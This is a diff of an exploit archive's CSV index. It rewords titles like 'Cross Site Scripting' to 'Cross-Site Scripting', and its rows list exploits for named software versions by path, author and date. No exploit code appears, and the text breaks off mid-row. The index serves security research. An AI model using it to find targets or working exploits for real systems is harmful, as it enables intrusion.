id,file,description,date,author,platform,type,port 37776,platforms/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote DoS",2015-08-15,St0rn,windows,dos,0 37777,platforms/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/DoS PoC",2015-08-15,"TUNISIAN CYBER",linux,dos,0 37778,platforms/hardware/webapps/37778.txt,"Security IP Camera Star Vision DVR - Authentication Bypass",2015-08-15,"Meisam Monsef",hardware,webapps,0 -37779,platforms/php/webapps/37779.txt,"Flogr 'index.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-05,"High-Tech Bridge",php,webapps,0 +37779,platforms/php/webapps/37779.txt,"Flogr 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,"High-Tech Bridge",php,webapps,0 37780,platforms/windows/local/37780.c,"ThinPrint 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution",2012-09-04,"Moshe Zioni",windows,local,0 -37781,platforms/php/webapps/37781.txt,"ExtCalendar 2.0 Multiple SQL Injection and HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",php,webapps,0 +37781,platforms/php/webapps/37781.txt,"ExtCalendar 2.0 - Multiple SQL Injection and HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",php,webapps,0 37782,platforms/php/webapps/37782.txt,"web@all Local File Inclusion and Multiple Arbitrary File Upload Vulnerabilities",2012-09-06,KedAns-Dz,php,webapps,0 37783,platforms/linux/dos/37783.c,"GNU glibc 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",linux,dos,0 37784,platforms/php/webapps/37784.txt,"Pinterestclones Security Bypass and HTML Injection Vulnerabilities",2012-09-08,DaOne,php,webapps,0 37785,platforms/php/webapps/37785.txt,"VICIDIAL Call Center Suite Multiple SQL Injection",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 37786,platforms/php/webapps/37786.txt,"DeltaScripts PHP Links Multiple SQL Injection",2012-09-10,L0n3ly-H34rT,php,webapps,0 -37787,platforms/php/webapps/37787.txt,"WordPress Download Monitor Plugin 'dlsearch' Parameter Cross Site Scripting",2012-08-30,"Chris Cooper",php,webapps,0 +37787,platforms/php/webapps/37787.txt,"WordPress Download Monitor Plugin 'dlsearch' Parameter Cross-Site Scripting",2012-08-30,"Chris Cooper",php,webapps,0 37788,platforms/linux/remote/37788.py,"libguac Remote Buffer Overflow",2012-09-11,"Michael Jumper",linux,remote,0 -37789,platforms/php/webapps/37789.txt,"Openfiler 2.3 Multiple Cross Site Scripting and Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",php,webapps,0 +37789,platforms/php/webapps/37789.txt,"Openfiler 2.3 - Multiple Cross-Site Scripting and Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",php,webapps,0 37790,platforms/php/webapps/37790.txt,"FBDj 'id' Parameter SQL Injection",2012-09-11,"TUNISIAN CYBER",php,webapps,0 -37791,platforms/multiple/webapps/37791.txt,"Atlassian Confluence 3.4.x Error Page Cross Site Scripting",2012-09-12,"D. Niedermaier",multiple,webapps,0 +37791,platforms/multiple/webapps/37791.txt,"Atlassian Confluence 3.4.x Error Page Cross-Site Scripting",2012-09-12,"D. Niedermaier",multiple,webapps,0 37792,platforms/android/remote/37792.txt,"Google Chrome for Android com.android.browser.application_id Intent Extra Data XSS",2012-09-12,"Artem Chaykin",android,remote,0 37793,platforms/android/remote/37793.txt,"Google Chrome for Android Multiple file:: URL Handler Local Downloaded Content Disclosure",2012-09-12,"Artem Chaykin",android,remote,0 37794,platforms/android/remote/37794.txt,"Google Chrome for Android Local Application Handling Cookie Theft Weakness",2012-09-12,"Artem Chaykin",android,remote,0 @@ -34129,7 +34129,7 @@ id,file,description,date,author,platform,type,port 37941,platforms/php/webapps/37941.txt,"SenseSites CommonSense CMS special.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS article.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37943,platforms/php/webapps/37943.txt,"WebTitan 'logs-x.php' Directory Traversal",2012-10-20,"Richard Conner",php,webapps,0 -37944,platforms/php/webapps/37944.txt,"vBSEO 'u' parameter Cross Site Scripting",2012-06-16,MegaMan,php,webapps,0 +37944,platforms/php/webapps/37944.txt,"vBSEO 'u' parameter Cross-Site Scripting",2012-06-16,MegaMan,php,webapps,0 37945,platforms/php/webapps/37945.txt,"SilverStripe 2.4.x - 'BackURL' Parameter URI Redirection",2012-10-15,"Aung Khant",php,webapps,0 37946,platforms/php/webapps/37946.txt,"WordPress Crayon Syntax Highlighter Plugin 'wp_load' Parameter Remote File Inclusion",2012-10-15,"Charlie Eriksen",php,webapps,0 38001,platforms/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22 @@ -34139,9 +34139,9 @@ id,file,description,date,author,platform,type,port 37801,platforms/hardware/webapps/37801.sh,"Sagemcom F@ST 3864 V2 - Get Admin Password",2015-08-17,"Cade Bull",hardware,webapps,0 37802,platforms/jsp/webapps/37802.html,"IFOBS 'regclientprint.jsp' Multiple HTML Injection Vulnerabilities",2012-09-15,MustLive,jsp,webapps,0 37803,platforms/hardware/remote/37803.txt,"CoSoSys Endpoint Protector Predictable Password Generation",2012-09-17,"Christopher Campbell",hardware,remote,0 -37804,platforms/php/webapps/37804.txt,"minimal Gallery 'index.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-17,ayastar,php,webapps,0 +37804,platforms/php/webapps/37804.txt,"minimal Gallery 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-17,ayastar,php,webapps,0 37805,platforms/php/webapps/37805.txt,"TAGWORX.CMS 'cid' Parameter SQL Injection",2012-09-18,Crim3R,php,webapps,0 -37806,platforms/cgi/webapps/37806.txt,"AxisInternet VoIP Manager Multiple Cross Site Scripting Vulnerabilities",2012-09-18,"Benjamin Kunz Mejri",cgi,webapps,0 +37806,platforms/cgi/webapps/37806.txt,"AxisInternet VoIP Manager Multiple Cross-Site Scripting Vulnerabilities",2012-09-18,"Benjamin Kunz Mejri",cgi,webapps,0 37807,platforms/php/webapps/37807.txt,"VBulletin 4.1.12 - 'blog_plugin_useradmin.php' SQL Injection",2012-09-18,Am!r,php,webapps,0 37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0 37809,platforms/php/webapps/37809.php,"Nuts CMS Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80 @@ -34156,21 +34156,21 @@ id,file,description,date,author,platform,type,port 37820,platforms/php/webapps/37820.txt,"CodoForum 3.3.1 - Multiple SQL Injection",2015-08-18,"Curesec Research Team",php,webapps,80 37821,platforms/php/webapps/37821.txt,"BigTree CMS 4.2.3 - Authenticated SQL Injection",2015-08-18,"Curesec Research Team",php,webapps,80 37822,platforms/php/webapps/37822.txt,"WordPress WP Symposium Plugin 15.1 - Blind SQL Injection",2015-08-18,dxw,php,webapps,80 -37827,platforms/php/webapps/37827.txt,"WordPress Purity Theme Multiple Cross Site Scripting Vulnerabilities",2012-09-07,"Matan Azugi",php,webapps,0 -37828,platforms/php/webapps/37828.txt,"Poweradmin 'index.php' Cross Site Scripting",2012-09-20,Siavash,php,webapps,0 -37829,platforms/php/webapps/37829.txt,"WordPress MF Gig Calendar Plugin Cross Site Scripting",2012-09-20,"Chris Cooper",php,webapps,0 +37827,platforms/php/webapps/37827.txt,"WordPress Purity Theme Multiple Cross-Site Scripting Vulnerabilities",2012-09-07,"Matan Azugi",php,webapps,0 +37828,platforms/php/webapps/37828.txt,"Poweradmin 'index.php' Cross-Site Scripting",2012-09-20,Siavash,php,webapps,0 +37829,platforms/php/webapps/37829.txt,"WordPress MF Gig Calendar Plugin Cross-Site Scripting",2012-09-20,"Chris Cooper",php,webapps,0 37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer Multiple Security Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0 37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure",2012-10-09,"Brad Spengler",linux,local,0 37938,platforms/php/webapps/37938.txt,"OpenX /www/admin/plugin-index.php parent Parameter XSS",2012-10-10,"High-Tech Bridge",php,webapps,0 37939,platforms/php/webapps/37939.txt,"FileContral - Local File Inclusion / Local File Disclosure",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0 -38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin 'errMsg' Parameter Cross Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0 +38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0 38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80 -37833,platforms/php/webapps/37833.txt,"YCommerce Multiple SQL Injection",2012-09-21,"Ricardo Almeida",php,webapps,0 +37833,platforms/php/webapps/37833.txt,"YCommerce - Multiple SQL Injection",2012-09-21,"Ricardo Almeida",php,webapps,0 37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 Unspecified Remote Code Execution",2012-09-24,kb,linux,remote,0 37835,platforms/php/webapps/37835.html,"WordPress Cross Site Request Forgery",2012-09-22,AkaStep,php,webapps,0 -37836,platforms/php/webapps/37836.txt,"WordPress Token Manager Plugin 'tid' Parameter Cross Site Scripting",2012-09-25,TheCyberNuxbie,php,webapps,0 +37836,platforms/php/webapps/37836.txt,"WordPress Token Manager Plugin 'tid' Parameter Cross-Site Scripting",2012-09-25,TheCyberNuxbie,php,webapps,0 37837,platforms/php/webapps/37837.html,"WordPress Sexy Add Template Plugin Cross Site Request Forgery",2012-09-22,the_cyber_nuxbie,php,webapps,0 -37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart 'SearchFor' Parameter Cross Site Scripting",2011-12-30,farbodmahini,php,webapps,0 +37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart 'SearchFor' Parameter Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0 37839,platforms/linux/dos/37839.txt,"Flash PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0 37840,platforms/windows/remote/37840.txt,"Flash Broker-Based Sandbox Escape via Forward Slash Instead of Backslash",2015-08-19,KeenTeam,windows,remote,0 37841,platforms/windows/remote/37841.txt,"Flash Broker-Based Sandbox Escape via Unexpected Directory Lock",2015-08-19,KeenTeam,windows,remote,0 @@ -34228,14 +34228,14 @@ id,file,description,date,author,platform,type,port 37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,Un_N0n,windows,dos,21 37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80 37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0 -37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin 'id' Parameter Cross Site Scripting",2012-09-26,"Scott Herbert",php,webapps,0 +37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin 'id' Parameter Cross-Site Scripting",2012-09-26,"Scott Herbert",php,webapps,0 37897,platforms/linux/dos/37897.html,"Midori Browser 0.3.2 Denial of Service",2012-09-27,"Ryuzaki Lawlet",linux,dos,0 37898,platforms/linux/local/37898.py,"Reaver Pro - Local Privilege Escalation",2012-09-30,infodox,linux,local,0 37899,platforms/php/webapps/37899.txt,"Switchvox Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0 37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0 37901,platforms/php/webapps/37901.txt,"AlamFifa CMS 'user_name_cookie' Parameter SQL Injection",2012-09-30,L0n3ly-H34rT,php,webapps,0 -37902,platforms/php/webapps/37902.php,"WordPress Akismet Plugin Multiple Cross Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",php,webapps,0 -37903,platforms/php/webapps/37903.txt,"Zenphoto 'admin-news-articles.php' Cross Site Scripting",2012-10-02,"Scott Herbert",php,webapps,0 +37902,platforms/php/webapps/37902.php,"WordPress Akismet Plugin Multiple Cross-Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",php,webapps,0 +37903,platforms/php/webapps/37903.txt,"Zenphoto 'admin-news-articles.php' Cross-Site Scripting",2012-10-02,"Scott Herbert",php,webapps,0 37904,platforms/php/webapps/37904.txt,"Omnistar Mailer Multiple SQL Injection and HTML Injection Vulnerabilities",2012-10-01,"Vulnerability Laboratory",php,webapps,0 37905,platforms/windows/dos/37905.rb,"PowerTCP WebServer for ActiveX Denial of Service",2012-09-28,catatonicprime,windows,dos,0 37906,platforms/php/webapps/37906.txt,"WordPress Googmonify Plugin 0.8.1 - XSS/CSRF",2015-08-21,"Ehsan Hosseini",php,webapps,80 @@ -34267,7 +34267,7 @@ id,file,description,date,author,platform,type,port 37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0 37933,platforms/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 37934,platforms/php/webapps/37934.txt,"WordPress Shopp Plugin Multiple Security Vulnerabilities",2012-10-05,T0x!c,php,webapps,0 -37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - (Cross Site Scripting/HTML Injection/SQL Injection) Multiple Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0 +37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - (Cross-Site Scripting/HTML Injection/SQL Injection) Multiple Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0 37936,platforms/php/webapps/37936.txt,"Open Realty 'select_users_lang' Parameter Local File Inclusion",2012-10-06,L0n3ly-H34rT,php,webapps,0 37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0 37954,platforms/windows/dos/37954.py,"Mock SMTP Server 1.0 Remote Crash PoC",2015-08-24,"Shankar Damodaran",windows,dos,25 @@ -34284,16 +34284,16 @@ id,file,description,date,author,platform,type,port 37965,platforms/hardware/webapps/37965.txt,"Keeper IP Camera 3.2.2.10 - Authentication Bypass",2015-08-25,"RAT - ThiefKing",hardware,webapps,0 37966,platforms/windows/dos/37966.txt,"Microsoft Office 2007 OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",windows,dos,0 37967,platforms/windows/dos/37967.txt,"Microsoft Office 2007 Malformed Document Stack-Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos,0 -37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 - 'index.php' Script Cross Site Scripting",2012-10-19,Netsparker,php,webapps,0 +37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 - 'index.php' Script Cross-Site Scripting",2012-10-19,Netsparker,php,webapps,0 37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN 'refreshURL' Parameter URI Redirection",2012-10-21,"Aung Khant",hardware,remote,0 -37970,platforms/php/webapps/37970.html,"WordPress Wordfence Security Plugin Cross Site Scripting",2012-10-18,MustLive,php,webapps,0 +37970,platforms/php/webapps/37970.html,"WordPress Wordfence Security Plugin Cross-Site Scripting",2012-10-18,MustLive,php,webapps,0 37971,platforms/php/webapps/37971.html,"WHMCS 4.5.2 - 'googlecheckout.php' SQL Injection",2012-10-22,"Starware Security Team",php,webapps,0 -37973,platforms/php/webapps/37973.txt,"SMF 'view' Parameter Cross Site Scripting",2012-10-23,Am!r,php,webapps,0 -37974,platforms/php/webapps/37974.txt,"Inventory Multiple Cross Site Scripting and SQL Injection",2012-10-26,G13,php,webapps,0 +37973,platforms/php/webapps/37973.txt,"SMF 'view' Parameter Cross-Site Scripting",2012-10-23,Am!r,php,webapps,0 +37974,platforms/php/webapps/37974.txt,"Inventory Multiple Cross-Site Scripting and SQL Injection",2012-10-26,G13,php,webapps,0 37975,platforms/linux/local/37975.py,"ZSNES 1.51 - Buffer Overflow",2015-08-26,"Juan Sacco",linux,local,0 37976,platforms/windows/dos/37976.py,"VLC Media Player 2.2.1 - m3u8/m3u Crash PoC",2015-08-26,"Naser Farhadi",windows,dos,0 37977,platforms/xml/webapps/37977.py,"Magento eCommerce - Remote Code Execution",2015-08-26,"Manish Tanwar",xml,webapps,0 -37978,platforms/php/webapps/37978.txt,"Gramophone 'rs' Parameter Cross Site Scripting",2012-10-25,G13,php,webapps,0 +37978,platforms/php/webapps/37978.txt,"Gramophone 'rs' Parameter Cross-Site Scripting",2012-10-25,G13,php,webapps,0 37979,platforms/php/webapps/37979.txt,"VicBlog Multiple SQL Injection",2012-10-26,Geek,php,webapps,0 37980,platforms/windows/dos/37980.pl,"Microsoft Office Excel Denial of Service",2012-10-11,"Jean Pascal Pereira",windows,dos,0 37981,platforms/windows/dos/37981.pl,"Microsoft Paint 5.1 - '.bmp' Denial of Service",2012-10-27,coolkaveh,windows,dos,0 @@ -34306,11 +34306,11 @@ id,file,description,date,author,platform,type,port 37988,platforms/linux/local/37988.py,"BSIGN 0.4.5 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0 37989,platforms/php/webapps/37989.txt,"IP.Board 4.X - Stored XSS",2015-08-27,snop,php,webapps,0 37990,platforms/multiple/dos/37990.txt,"QEMU Programmable Interrupt Timer Controller Heap Overflow",2015-08-27,"Google Security Research",multiple,dos,0 -37991,platforms/php/webapps/37991.txt,"WANem Multiple Cross Site Scripting Vulnerabilities",2012-10-16,"Brendan Coles",php,webapps,0 -37992,platforms/php/webapps/37992.txt,"CorePlayer 'callback' Parameter Cross Site Scripting",2012-10-28,MustLive,php,webapps,0 +37991,platforms/php/webapps/37991.txt,"WANem Multiple Cross-Site Scripting Vulnerabilities",2012-10-16,"Brendan Coles",php,webapps,0 +37992,platforms/php/webapps/37992.txt,"CorePlayer 'callback' Parameter Cross-Site Scripting",2012-10-28,MustLive,php,webapps,0 37993,platforms/php/webapps/37993.txt,"Joomla! 'com_quiz' Component SQL Injection",2012-10-30,"Daniel Barragan",php,webapps,0 -37994,platforms/php/webapps/37994.txt,"NetCat CMS Multiple Cross Site Scripting Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 -37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross Site Scripting",2012-10-31,"Anthony Trummer",asp,webapps,0 +37994,platforms/php/webapps/37994.txt,"NetCat CMS Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 +37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross-Site Scripting",2012-10-31,"Anthony Trummer",asp,webapps,0 37996,platforms/windows/remote/37996.txt,"Axigen Mail Server 'fileName' Parameter Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0 37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service",2015-08-28,Vulnerability-Lab,ios,dos,3030 37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80 @@ -34320,7 +34320,7 @@ id,file,description,date,author,platform,type,port 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80 38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0 -38006,platforms/php/webapps/38006.txt,"bloofoxCMS 0.3.5 Multiple Cross Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0 +38006,platforms/php/webapps/38006.txt,"bloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0 38007,platforms/php/webapps/38007.txt,"DCForum auth_user_file.txt File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0 38008,platforms/php/webapps/38008.txt,"Joomla! com_parcoauto Component 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0 38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0 @@ -34338,7 +34338,7 @@ id,file,description,date,author,platform,type,port 38021,platforms/multiple/dos/38021.pl,"Media Player Classic 1.5 - (MPC) WebServer Request Handling Remote DoS",2012-11-16,X-Cisadane,multiple,dos,0 38022,platforms/php/webapps/38022.txt,"WordPress Dailyedition-mouss Theme 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 38023,platforms/php/webapps/38023.txt,"WordPress Tagged Albums Plugin 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 -38024,platforms/php/webapps/38024.txt,"WebKit Cross Site Scripting Filter 'XSSAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",php,webapps,0 +38024,platforms/php/webapps/38024.txt,"WebKit Cross-Site Scripting Filter 'XSSAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",php,webapps,0 38025,platforms/php/webapps/38025.txt,"Omni-Secure 'dir' Parameter Multiple File Disclosure Vulnerabilities",2012-11-19,HaCkeR_EgY,php,webapps,0 38026,platforms/php/webapps/38026.txt,"Friends in War The FAQ Manager 'question' Parameter SQL Injection",2012-11-16,unsuprise,php,webapps,0 38027,platforms/php/webapps/38027.txt,"PhpWiki 1.5.4 - Multiple Vulnerabilities",2015-08-31,smash,php,webapps,80 @@ -34388,8 +34388,8 @@ id,file,description,date,author,platform,type,port 38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator 2.0.1 - Multiple CSRF Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80 38076,platforms/php/webapps/38076.txt,"BigDump 0.29b and 0.32b - Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0 38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0 -38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting",2012-11-29,cheki,php,webapps,0 -38099,platforms/php/webapps/38099.txt,"TinyMCPUK 'test' Parameter Cross Site Scripting",2012-12-01,eidelweiss,php,webapps,0 +38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross-Site Scripting",2012-11-29,cheki,php,webapps,0 +38099,platforms/php/webapps/38099.txt,"TinyMCPUK 'test' Parameter Cross-Site Scripting",2012-12-01,eidelweiss,php,webapps,0 38080,platforms/hardware/webapps/38080.txt,"Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities",2015-09-04,Vulnerability-Lab,hardware,webapps,0 38081,platforms/hardware/webapps/38081.txt,"HooToo Tripmate HT-TM01 2.000.022 - CSRF",2015-09-04,"Ken Smith",hardware,webapps,80 38085,platforms/win_x86-64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash PoC",2015-09-06,"Robbie Corley",win_x86-64,dos,0 @@ -34398,7 +34398,7 @@ id,file,description,date,author,platform,type,port 38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OS X Client 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0 38090,platforms/php/webapps/38090.txt,"FireEye Appliance - Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443 38091,platforms/php/webapps/38091.php,"Elastix < 2.5 - PHP Code Injection Exploit",2015-09-06,i-Hmx,php,webapps,0 -38100,platforms/hardware/remote/38100.txt,"Multiple Fortinet FortiWeb Appliances Multiple Cross Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",hardware,remote,0 +38100,platforms/hardware/remote/38100.txt,"Multiple Fortinet FortiWeb Appliances Multiple Cross-Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",hardware,remote,0 38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin 'language' Parameter Local File Inclusion",2012-12-30,Amirh03in,php,webapps,0 38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0 38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0 @@ -34432,7 +34432,7 @@ id,file,description,date,author,platform,type,port 38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0 38130,platforms/java/webapps/38130.txt,"N-able N-central Cross-Site Request Forgery",2012-12-13,"Cartel Informatique Security Research Labs",java,webapps,0 -38131,platforms/php/webapps/38131.txt,"PHP Address Book 'group' Parameter Cross Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0 +38131,platforms/php/webapps/38131.txt,"PHP Address Book 'group' Parameter Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0 38132,platforms/linux/dos/38132.py,"Linux Kernel 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service",2012-12-13,"Pascal Junod",linux,dos,0 38133,platforms/php/webapps/38133.txt,"RokBox Plugin for WordPress /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter XSS",2012-12-17,MustLive,php,webapps,0 38134,platforms/php/webapps/38134.txt,"Joomla! ZT Autolinks Component 'controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 @@ -34442,7 +34442,7 @@ id,file,description,date,author,platform,type,port 38140,platforms/php/webapps/38140.php,"VoipNow Service Provider Edition Remote Arbitrary Command Execution",2012-12-21,i-Hmx,php,webapps,0 38141,platforms/php/webapps/38141.txt,"Hero Framework search q Parameter XSS",2012-12-24,"Stefan Schurtz",php,webapps,0 38142,platforms/php/webapps/38142.txt,"Hero Framework users/login username Parameter XSS",2012-12-24,"Stefan Schurtz",php,webapps,0 -38143,platforms/php/webapps/38143.txt,"cPanel 'account' Parameter Cross Site Scripting",2012-12-24,"Rafay Baloch",php,webapps,0 +38143,platforms/php/webapps/38143.txt,"cPanel 'account' Parameter Cross-Site Scripting",2012-12-24,"Rafay Baloch",php,webapps,0 38144,platforms/php/webapps/38144.txt,"City Reviewer 'search.php' Script SQL Injection",2012-12-22,3spi0n,php,webapps,0 38145,platforms/linux/dos/38145.txt,"OpenLDAP 2.4.42 - ber_get_next Denial of Service",2015-09-11,"Denis Andzakovic",linux,dos,389 38146,platforms/windows/dos/38146.html,"Microsoft Internet Explorer 11 - Stack Underflow Crash PoC",2015-09-11,Mjx,windows,dos,0 @@ -34455,8 +34455,8 @@ id,file,description,date,author,platform,type,port 38152,platforms/php/webapps/38152.txt,"MotoCMS admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0 38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) /webmail/x3/mail/clientconf.html acct Parameter XSS",2012-12-27,"Christy Philip Mathew",php,webapps,0 38154,platforms/php/webapps/38154.txt,"cPanel detailbw.html Multiple Parameter XSS",2012-12-27,"Christy Philip Mathew",php,webapps,0 -38155,platforms/php/webapps/38155.txt,"WHM 'filtername' Parameter Cross Site Scripting",2012-12-27,"Rafay Baloch",php,webapps,0 -38156,platforms/php/webapps/38156.txt,"cPanel 'dir' Parameter Cross Site Scripting",2012-12-26,"Rafay Baloch",php,webapps,0 +38155,platforms/php/webapps/38155.txt,"WHM 'filtername' Parameter Cross-Site Scripting",2012-12-27,"Rafay Baloch",php,webapps,0 +38156,platforms/php/webapps/38156.txt,"cPanel 'dir' Parameter Cross-Site Scripting",2012-12-26,"Rafay Baloch",php,webapps,0 38157,platforms/php/webapps/38157.txt,"WordPress Xerte Online Plugin 'save.php' Arbitrary File Upload",2013-01-02,"Sammy FORGIT",php,webapps,0 38158,platforms/php/webapps/38158.txt,"WordPress Shopping Cart Plugin for WordPress /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 38159,platforms/php/webapps/38159.txt,"WordPress Shopping Cart Plugin for WordPress /wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 @@ -34471,11 +34471,11 @@ id,file,description,date,author,platform,type,port 38168,platforms/php/webapps/38168.txt,"TomatoCart 'json.php' Security Bypass",2013-01-04,"Aung Khant",php,webapps,0 38169,platforms/php/webapps/38169.txt,"Havalite CMS 'comment' Parameter HTML 